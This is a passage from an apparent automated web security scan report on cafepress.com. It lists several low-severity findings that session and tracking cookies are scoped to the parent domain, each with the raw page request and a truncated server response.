s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 60330 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.6. http://www.cafepress.com/+baby-blanket
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58677 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58677 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.7. http://www.cafepress.com/+baby-bodysuits
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59167 Date: Sun, 26 Dec 2010 13:46:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59167 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.8. http://www.cafepress.com/+baby-hat
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58517 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.9. http://www.cafepress.com/+bags
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59533 Date: Sun, 26 Dec 2010 13:46:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59533 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.10. http://www.cafepress.com/+boxers
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59426 Date: Sun, 26 Dec 2010 13:47:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59426 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.11. http://www.cafepress.com/+bumper-stickers
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59721 Date: Sun, 26 Dec 2010 13:48:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.12. http://www.cafepress.com/+buttons
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+buttons
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
